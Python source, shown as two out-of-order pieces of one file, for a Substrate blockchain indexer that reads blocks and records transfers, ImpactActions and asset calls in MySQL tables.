cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
print("Destroy Oracle")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Id Oracle: ",idoracle)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
deltx="delete from impactactionsoracles where id=%s"
datatx=(idoracle,)
try:
cursor.execute(deltx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to store Impact Actions - New Approval Request
def impactactions_newapprovalrequest(blocknumber,txhash,signer,currenttime,approvalrequestid,info):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
#decode json structure
print("Storing New Approval Request")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Id: ",approvalrequestid)
print("Info: ",info)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
addtx="insert into impactactionsapprovalrequests set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s,id=%s,info=%s"
datatx=(blocknumber,txhash,signer,dtblockchain,approvalrequestid,info)
try:
cursor.execute(addtx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to store Impact Actions - Vote Approval Request
def impactactions_voteapprovalrequest(blocknumber,txhash,signer,currenttime,approvalrequestid,data):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
j=json.loads(data)
vote=j['vote']
otherinfo=j['otherinfo']
print("Storing Vote of an Approval Request")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Id Approval: ",approvalrequestid)
print("Vote: ",vote)
print("Other Info: ",otherinfo)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
addtx="insert into impactactionsapprovalrequestauditorvotes set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s,approvalrequestid=%s,vote=%s,otherinfo=%s"
datatx=(blocknumber,txhash,signer,dtblockchain,approvalrequestid,vote,otherinfo)
try:
cursor.execute(addtx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to store Impact Actions - Assign Auditor to Approval Request
def impactactions_assignauditorapprovalrequest(blocknumber,txhash,signer,currenttime,approvalrequestid,auditor,maxdays):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
#decode json structure
print("Storing Assigned Auditor for an Approval Request")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Approval Request Id: ",approvalrequestid)
print("Auditor: ",auditor)
print("Max days: ",maxdays)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
addtx="insert into impactactionsapprovalrequestsauditors set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s,approvalrequestid=%s,auditor=%s,maxdays=%s"
datatx=(blocknumber,txhash,signer,dtblockchain,approvalrequestid,auditor,maxdays)
try:
cursor.execute(addtx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to store Impact Actions - Destroy Auditor
def impactactions_destory_assignedauditorapprovalrequest(blocknumber,txhash,signer,currenttime,approvalrequestid,auditor):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
print("Destroy Assigned Auditor to an Approval Request")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Approval Request id: ",approvalrequestid)
print("Auditor: ",auditor)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
deltx="delete from impactactionsapprovalrequestsauditors where approvalrequestid=%s and auditor=%s"
datatx=(approvalrequestid,auditor)
try:
cursor.execute(deltx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to store Impact Actions - New Auditor
def impactactions_newauditor(blocknumber,txhash,signer,currenttime,account,data):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
#decode json structure
j=json.loads(data)
print("Storing New Auditor")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Account: ",account)
print("Data: ",data)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
addtx="insert into impactactionsauditors set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s"
addtx=addtx+",description=%s,account=%s,categories=%s,area=%s,otherinfo=%s"
if 'otherinfo' in j:
o=j['otherinfo']
else:
o=''
datatx=(blocknumber,txhash,signer,dtblockchain,j['description'],account,json.dumps(j['categories']),j['area'],o)
try:
cursor.execute(addtx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to store Impact Actions - Destroy Auditor
def impactactions_destroyauditor(blocknumber,txhash,signer,currenttime,account):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
print("Destroy Auditor")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("account: ",account)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
deltx="delete from impactactionsauditors where account=%s"
datatx=(account,)
try:
cursor.execute(deltx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to store Impact Actions - New Proxy
def impactactions_newproxy(blocknumber,txhash,signer,currenttime,idproxy, account):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
print("Storing New Proxy")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Account: ",account)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
addtx="insert into impactactionsproxy set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s"
addtx=addtx+",id=%s,account=%s"
datatx=(blocknumber,txhash,signer,dtblockchain,idproxy,account)
try:
cursor.execute(addtx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to store Impact Actions - Destroy Proxy
def impactactions_destroyproxy(blocknumber,txhash,signer,currenttime,idproxy):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
print("Destroy Proxy")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("id Proxy: ",idproxy)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
deltx="delete from impactactionsproxy where id=%s"
datatx=(idproxy,)
try:
cursor.execute(deltx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to store Impact Actions - New Category
def impactactions_newcategory(blocknumber,txhash,signer,currenttime,idcategory,description):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
print("Storing New Category")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Id category: ",idcategory)
print("Description: ",description)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
addtx="insert into impactactionscategories set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s,id=%s,description=%s"
datatx=(blocknumber,txhash,signer,dtblockchain,idcategory,description)
try:
cursor.execute(addtx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to store Impact Actions - Destroy Category
def impactactions_destroycategory(blocknumber,txhash,signer,currenttime,idcategory):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
print("Destroy Category")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Id category: ",idcategory)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
deltx="delete from impactactionscategories where id=%s"
datatx=(idcategory,)
try:
cursor.execute(deltx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to create new asset from Sudo
def assets_force_create(blocknumber,txhash,signer,currenttime,assetid,owner,maxzombies,minbalance):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
print("Create Asset (Fungible Tokens)")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Asset Id : ",assetid)
print("Owner : ",owner)
print("Max Zombies : ",maxzombies)
print("Min Balance : ",minbalance)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
addtx="insert into ftassets set blocknumber=%s,txhash=%s,signer=%s,assetid=%s,owner=%s,maxzombies=%s,minbalance=%s,dtblockchain=%s"
datatx=(blocknumber,txhash,signer,assetid,owner,maxzombies,minbalance,dtblockchain)
try:
cursor.execute(addtx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to mint assets in favor of an account
def assets_mint(blocknumber,txhash,signer,currenttime,assetid,recipient,amount):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
category="Minted"
print("Mint Assets (Fungible Tokens)")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Asset Id : ",assetid)
print("Recipient : ",recipient)
print("Amount : ",amount)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
addtx="insert into fttransactions set blocknumber=%s,txhash=%s,signer=%s,sender=%s,category=%s,assetid=%s,recipient=%s,amount=%s,dtblockchain=%s"
datatx=(blocknumber,txhash,signer,signer,category,assetid,recipient,amount,dtblockchain)
try:
cursor.execute(addtx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to burn assets decrease the balance of an account
def assets_burn(blocknumber,txhash,signer,currenttime,assetid,recipient,amount):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
category="Burned"
print("Burn Assets (Fungible Tokens)")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Asset Id : ",assetid)
print("Recipient : ",recipient)
print("Amount : ",amount)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
addtx="insert into fttransactions set blocknumber=%s,txhash=%s,signer=%s,sender=%s,category=%s,assetid=%s,recipient=%s,amount=%s,dtblockchain=%s"
datatx=(blocknumber,txhash,signer,signer,category,assetid,recipient,amount,dtblockchain)
try:
cursor.execute(addtx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to transfer assets in favor of an account
def assets_transfer(blocknumber,txhash,signer,currenttime,assetid,recipient,amount):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
category="Transfer"
print("Mint Assets (Fungible Tokens)")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Asset Id : ",assetid)
print("Recipient : ",recipient)
print("Amount : ",amount)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
addtx="insert into fttransactions set blocknumber=%s,txhash=%s,signer=%s,sender=%s,category=%s,assetid=%s,recipient=%s,amount=%s,dtblockchain=%s"
datatx=(blocknumber,txhash,signer,signer,category,assetid,recipient,amount,dtblockchain)
try:
cursor.execute(addtx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to force transfer assets in favor of an account
def assets_forcetransfer(blocknumber,txhash,signer,sender,currenttime,assetid,recipient,amount):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
category="Transfer"
print("Mint Assets (Fungible Tokens)")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Asset Id : ",assetid)
print("Recipient : ",recipient)
print("Amount : ",amount)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
addtx="insert into fttransactions set blocknumber=%s,txhash=%s,signer=%s,sender=%s,category=%s,assetid=%s,recipient=%s,amount=%s,dtblockchain=%s"
datatx=(blocknumber,txhash,signer,signer,category,assetid,recipient,amount,dtblockchain)
try:
cursor.execute(addtx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to destroy asset (Fungible Tokens) from Sudo
def assets_force_destroy(blocknumber,txhash,signer,currenttime,assetid,witnesszombies):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
print("Destroy Asset (Fungible Tokens)")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Asset Id: ",assetid)
print("Witnesses Zombies: ",witnesszombies)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
deltx="delete from ftassets where assetid=%s"
datatx=(assetid,)
try:
cursor.execute(deltx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to process a block of data
def process_block(blocknumber):
# Retrieve extrinsics in block
print("Processing Block # ",blocknumber)
result = substrate.get_block(block_number=blocknumber)
print ("##########################")
print(result)
print("Block Hash: ",result['header']['hash'])
blockhash=result['header']['hash']
print ("##########################")
events=substrate.get_events(result['header']['hash'])
print ("#######EVENTS##############")
print(events)
print ("##########################")
# retrieve receipt
cnt=0
for extrinsic in result['extrinsics']:
if extrinsic.address:
signed_by_address = extrinsic.address.value
else:
signed_by_address = None
print('\nPallet: {}\nCall: {}\nSigned by: {}'.format(
extrinsic.call_module.name,
extrinsic.call.name,
signed_by_address
))
# check for exstrinc success or not
try:
error=events[cnt].params[0]['value'].get('Error')
except:
error=None
if events[cnt].event.name=="ExtrinsicFailed" or error!=None :
print("Extrinsic has failed")
cnt=cnt+1
continue
else:
print("Extrinsic succeded: ",events[cnt].event.name)
print("extrinsic.extrinsic_hash: ",extrinsic.extrinsic_hash)
print("extrinsic: ",extrinsic)
print("blockhash: ",blockhash)
gasfees=0
if (extrinsic.extrinsic_hash!=None):
# get receipt of the extrisinc
receipt = ExtrinsicReceipt(
substrate=substrate,
extrinsic_hash=extrinsic.extrinsic_hash,
block_hash=blockhash
)
print("************RECEIPT**************")
print("blockhash: ",blockhash)
print("extrinsic.extrinsic_hash: ",extrinsic.extrinsic_hash)
print("receipt.total_fee_amount: ",receipt.total_fee_amount)
print(receipt.is_success)
print(receipt.extrinsic.call_module.name)
print(receipt.extrinsic.call.name)
print(receipt.weight)
print("*********************************")
gasfees=receipt.total_fee_amount
#for TimeStamp call we set the time of the following transactions
if extrinsic.call_module.name=="Timestamp" and extrinsic.call.name=="set":
currentime=extrinsic.params[0]['value']
#Balance Transfer we update the transactions
if extrinsic.call_module.name=="Balances" and ( extrinsic.call.name=="transfer" or extrinsic.call.name=="transfer_keep_alive"):
## store the transaction in the database
store_transaction(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,extrinsic.params[0]['value'],extrinsic.params[1]['value'],currentime,gasfees)
#Impact Actions - Vote Approval Request
if extrinsic.call_module.name=="ImpactActions" and extrinsic.call.name=="vote_approval_request":
impactactions_voteapprovalrequest(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'])
#Impact Actions - Vote Approval Request
if extrinsic.call_module.name=="ImpactActions" and extrinsic.call.name=="request_approval":
impactactions_newapprovalrequest(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'])
#Impact Actions - Assign Auditor to Approval Request
if extrinsic.call_module.name=="ImpactActions" and extrinsic.call.name=="assign_auditor":
impactactions_assignauditorapprovalrequest(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'],extrinsic.params[2]['value'])
#Impact Actions - Remove Assigned Auditor to Approval Request
if extrinsic.call_module.name=="ImpactActions" and extrinsic.call.name=="destroy_assigned_auditor":
impactactions_destory_assignedauditorapprovalrequest(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'])
#Assets - Create new asset as regular user
if extrinsic.call_module.name=="Assets" and extrinsic.call.name=="create":
assets_force_create(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'],extrinsic.params[2]['value'],extrinsic.params[3]['value'])
#Assets - Destroy asset as regular user
if extrinsic.call_module.name=="Assets" and extrinsic.call.name=="destroy":
assets_force_destroy(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'])
#Assets - Mint assets in favor of an account
if extrinsic.call_module.name=="Assets" and extrinsic.call.name=="mint":
assets_mint(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'],extrinsic.params[2]['value'])
#Assets - Burn assets decreasing the balance of an account
if extrinsic.call_module.name=="Assets" and extrinsic.call.name=="burn":
assets_burn(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'],extrinsic.params[2]['value'])
#Assets - Transfer assets in favor of an account
if extrinsic.call_module.name=="Assets" and extrinsic.call.name=="transfer":
assets_transfer(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'],extrinsic.params[2]['value'])
# Sudo Calls
if extrinsic.call_module.name=="Sudo" and extrinsic.call.name=="sudo":
print(extrinsic.params[0].get('value'))
c=extrinsic.params[0].get('value')
# new impact action
if c['call_module']== 'ImpactActions' and c['call_function']=='create_impact_action':
print("Impact Actions - Create New Impact Action")
print("id: ",c['call_args'][0]['value'])
print("data: ",c['call_args'][1]['value'])
impactactions_newimpactaction(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'],c['call_args'][1]['value'])
# destroy impact action
if c['call_module']== 'ImpactActions' and c['call_function']=='destroy_impact_action':
print("Impact Actions - Destroy Impact Action")
print("id: ",c['call_args'][0]['value'])
impactactions_destroyimpactaction(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'])
# new oracle
if c['call_module']== 'ImpactActions' and c['call_function']=='create_oracle':
print("Impact Actions - Create New Oracle")
print("id: ",c['call_args'][0]['value'])
print("data: ",c['call_args'][1]['value'])
impactactions_neworacle(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'],c['call_args'][1]['value'])
# destroy oracle
if c['call_module']== 'ImpactActions' and c['call_function']=='destroy_oracle':
print("Impact Actions - Destroy Oracle")
print("id: ",c['call_args'][0]['value'])
impactactions_destroyoracle(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'])
# new auditor
if c['call_module']== 'ImpactActions' and c['call_function']=='create_auditor':
print("Impact Actions - Create New Auditor")
print("id: ",c['call_args'][0]['value'])
print("data: ",c['call_args'][1]['value'])
impactactions_newauditor(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'],c['call_args'][1]['value'])
# destroy auditor
if c['call_module']== 'ImpactActions' and c['call_function']=='destroy_auditor':
print("Impact Actions - Destroy Auditor")
print("id: ",c['call_args'][0]['value'])
impactactions_destroyauditor(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'])
# new proxy account
if c['call_module']== 'ImpactActions' and c['call_function']=='create_proxy':
print("Impact Actions - Create New Proxy")
print("id: ",c['call_args'][0]['value'])
print("account: ",c['call_args'][1]['value'])
impactactions_newproxy(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'],c['call_args'][1]['value'])
# destroy proxy
if c['call_module']== 'ImpactActions' and c['call_function']=='destroy_proxy':
print("Impact Actions - Destroy Proxy")
print("id: ",c['call_args'][0]['value'])
impactactions_destroyproxy(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'])
# new category
if c['call_module']== 'ImpactActions' and c['call_function']=='create_category':
print("Impact Actions - Create New Category")
print("id: ",c['call_args'][0]['value'])
print("description: ",c['call_args'][1]['value'])
impactactions_newcategory(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'],c['call_args'][1]['value'])
# destroy category
if c['call_module']== 'ImpactActions' and c['call_function']=='destroy_category':
print("Impact Actions - Destroy Category")
print("id: ",c['call_args'][0]['value'])
impactactions_destroycategory(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'])
# Force Create Asset
if c['call_module']== 'Assets' and c['call_function']=='force_create':
print("Fungibile Tokens - Create Asset")
print("id: ",c['call_args'][0]['value'])
print("Owner: ",c['call_args'][1]['value'])
print("Max Zombies: ",c['call_args'][2]['value'])
print("Minimum Deposit: ",c['call_args'][3]['value'])
assets_force_create(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'],c['call_args'][1]['value'],c['call_args'][2]['value'],c['call_args'][3]['value'])
# Force transfer Assets
if c['call_module']== 'Assets' and c['call_function']=='force_transfer':
print("Fungible Tokens - Force Transfer")
print("id: ",c['call_args'][0]['value'])
print("Witnesses Zombies: ",c['call_args'][1]['value'])
assets_forcetransfer(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,c['call_args'][1]['value'],currentime,c['call_args'][0]['value'],c['call_args'][2]['value'],c['call_args'][3]['value'])
# Force Destroy Asset
if c['call_module']== 'Assets' and c['call_function']=='force_destroy':
print("Fungible Tokens - Create Asset")
print("id: ",c['call_args'][0]['value'])
print("Witnesses Zombies: ",c['call_args'][1]['value'])
assets_force_destroy(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,c['call_args'][0]['value'],c['call_args'][1]['value'])
# Loop through call params
for param in extrinsic.params:
if param['type'] == 'Compact<Balance>':
param['value'] = '{} {}'.format(param['value'] / 10 ** substrate.token_decimals, substrate.token_symbol)
print("Param '{}': {}".format(param['name'], param['value']))
cnt=cnt+1
# subscription handler for new blocks written
def subscription_handler(obj, update_nr, subscription_id):
print(f"New block #{obj["header"]["number"]} produced by {obj["author"]} hash: {obj["header"]["hash"]}")
# call the block management function
process_block(obj['header']['number'])
## MAIN
# load custom data types
custom_type_registry = load_type_registry_file("../assets/types.json")
# define connection parameters
substrate = SubstrateInterface(
url=NODE,
ss58_format=42,
type_registry_preset='default',
type_registry=custom_type_registry
)
# create database tables
create_tables()
# syncronise the blockchain
if(len(sys.argv)>1):
if (sys.argv[1]== '--sync' or sys.argv[1]=="-s"):
sync_blockchain(substrate)
# subscribe to new block writing and process them in real time
result = substrate.subscribe_block_headers(subscription_handler, include_author=True)
print(result)
| # The App listening to new blocks written read the exstrincs and store the transactions in a mysql/mariadb database.
# the database must be created, the app will create the tables and indexes used.
# import libraries
# system packages
import sys
import os
import json
# Substrate module
from substrateinterface import SubstrateInterface, Keypair,ExtrinsicReceipt
from substrateinterface.exceptions import SubstrateRequestException
# base64 encoder/decoder
import base64
# base58 encoder/decoder
import base58
#import scale library to load data types
import scalecodec
# import mysql connector
import mysql.connector
currentime=""
# read environment variables
try:
DB_NAME=os.environ['DB_NAME']
DB_USER=os.environ['DB_USER']
DB_PWD=os.environ['DB_PWD']
DB_HOST=os.environ['DB_HOST']
NODE=os.environ['NODE']
except NameError:
print("System Variables have not been set")
exit(1)
# function to load data types registry
def load_type_registry_file(file_path: str) -> dict:
with open(os.path.abspath(file_path), 'r') as fp:
data = fp.read()
return json.loads(data)
# function to create tables required
def create_tables():
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
cursor = cnx.cursor()
# use database
try:
cursor.execute("USE {}".format(DB_NAME))
except mysql.connector.Error as err:
print("Database {} does not exists.".format(DB_NAME))
print(err)
exit(1)
# create tables
createtx="CREATE TABLE `transactions` (`id` MEDIUMINT NOT NULL AUTO_INCREMENT,\
`blocknumber` INT(11) NOT NULL,`txhash` VARCHAR(66) NOT NULL, \
`sender` VARCHAR(64) NOT NULL, `recipient` VARCHAR(64) NOT NULL, \
`amount` numeric(32,0) NOT NULL, \
`gasfees` numeric(32,0) NOT NULL, \
`dtblockchain` DATETIME NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash),PRIMARY KEY (id))"
try:
print("Creating table TRANSACTIONS...")
cursor.execute(createtx)
except mysql.connector.Error as err:
if(err.msg!="Table 'transactions' already exists"):
print(err.msg)
else:
print("OK")
# create indexes
createidxtx="CREATE INDEX txhash on transactions(txhash)"
try:
print("Creating index TXHASH on TRANSACTIONS...")
cursor.execute(createidxtx)
except mysql.connector.Error as err:
if(err.msg!="Duplicate key name 'txhash'"):
print(err.msg)
else:
print("OK")
createidxtx="CREATE INDEX sender on transactions(sender)"
try:
print("Creating index SENDER on TRANSACTIONS...")
cursor.execute(createidxtx)
except mysql.connector.Error as err:
if(err.msg!="Duplicate key name 'sender'"):
print(err.msg)
else:
print("OK")
createidxtx="CREATE INDEX recipient on transactions(recipient)"
try:
print("Creating index RECIPIENT on TRANSACTIONS...")
cursor.execute(createidxtx)
except mysql.connector.Error as err:
if(err.msg!="Duplicate key name 'recipient'"):
print(err.msg)
else:
print("OK")
# creating sync table to keep syncronisation info
createsync="CREATE TABLE `sync` (`id` MEDIUMINT NOT NULL AUTO_INCREMENT,\
`lastblocknumberverified` INT(11) NOT NULL, \
`lastapprovalrequestprocessed` int(11) default 0 not null,\
PRIMARY KEY (id))"
try:
print("Creating table SYNC...")
cursor.execute(createsync)
except mysql.connector.Error as err:
if(err.msg!="Table 'sync' already exists"):
print(err.msg)
else:
print("OK")
# creating categories table for impact actions
createcategories="CREATE TABLE `impactactionscategories` (`id` MEDIUMINT NOT NULL,\
`blocknumber` INT(11) NOT NULL,\
`txhash` VARCHAR(66) NOT NULL,\
`dtblockchain` DATETIME NOT NULL,\
`signer` VARCHAR(48) NOT NULL,\
`description` VARCHAR(64) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash), PRIMARY KEY (id))"
try:
print("Creating table impactactionscategories...")
cursor.execute(createcategories)
except mysql.connector.Error as err:
if(err.msg!="Table 'impactactionscategories' already exists"):
print(err.msg)
else:
print("OK")
# creating impactactions table for impact actions
createactions="CREATE TABLE `impactactions` (`id` MEDIUMINT NOT NULL,\
`blocknumber` INT(11) NOT NULL,\
`txhash` VARCHAR(66) NOT NULL,\
`dtblockchain` DATETIME NOT NULL,\
`signer` VARCHAR(48) NOT NULL,\
`description` VARCHAR(128) NOT NULL,\
`category` INT(11) NOT NULL,`auditors` INT(11) NOT NULL,`blockstart` INT(11) NOT NULL,\
`blockend` INT(11) NOT NULL, `rewardstoken` INT(11) NOT NULL, `rewardsamount` INT(32) NOT NULL,\
`rewardsoracle` INT(32) NOT NULL,`rewardauditors` INT(32) NOT NULL,\
`slashingsauditors` INT(32) NOT NULL,`maxerrorsauditor` INT(11) NOT NULL,\
`fields` varchar(8192) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash), \
PRIMARY KEY (id))"
try:
print("Creating table impactactions...")
cursor.execute(createactions)
except mysql.connector.Error as err:
if(err.msg!="Table 'impactactions' already exists"):
print(err.msg)
else:
print("OK")
# creating impactactionsoracles table for impact actions
createactions="CREATE TABLE `impactactionsoracles` (`id` MEDIUMINT NOT NULL,\
`blocknumber` INT(11) NOT NULL,\
`txhash` VARCHAR(66) NOT NULL,\
`dtblockchain` DATETIME NOT NULL,\
`signer` VARCHAR(48) NOT NULL,\
`description` VARCHAR(128) NOT NULL,\
`account` VARCHAR(48) NOT NULL,`otherinfo` VARCHAR(66) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash),\
PRIMARY KEY (id))"
try:
print("Creating table impactactionsoracles...")
cursor.execute(createactions)
except mysql.connector.Error as err:
